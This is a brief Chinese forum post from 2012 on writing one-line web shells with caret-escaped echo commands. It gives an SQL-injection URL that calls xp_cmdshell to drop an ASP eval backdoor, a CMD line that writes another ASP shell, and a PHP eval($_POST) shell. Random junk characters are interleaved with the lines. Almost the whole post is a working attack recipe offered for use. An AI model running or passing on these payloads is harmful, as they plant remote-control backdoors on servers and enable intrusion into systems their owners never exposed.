用^转义字符来写ASP(一句话木马)文件的方法:
0 B. m; `* H% H* p- o! ]( X+ m% e2 V/ g
1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--- H3 f3 t$ A. ? W$ ~
6 J" M1 R+ y1 m& a& ~5 X/ ^6 C& `
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp, K9 R. i. A/ n' M3 Z
% h" ~8 G. p3 V9 h- N$ {
]1 j' A4 D8 u, k; E6 NPHP1 p, {& C+ l$ p" ]. q; Z3 V
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对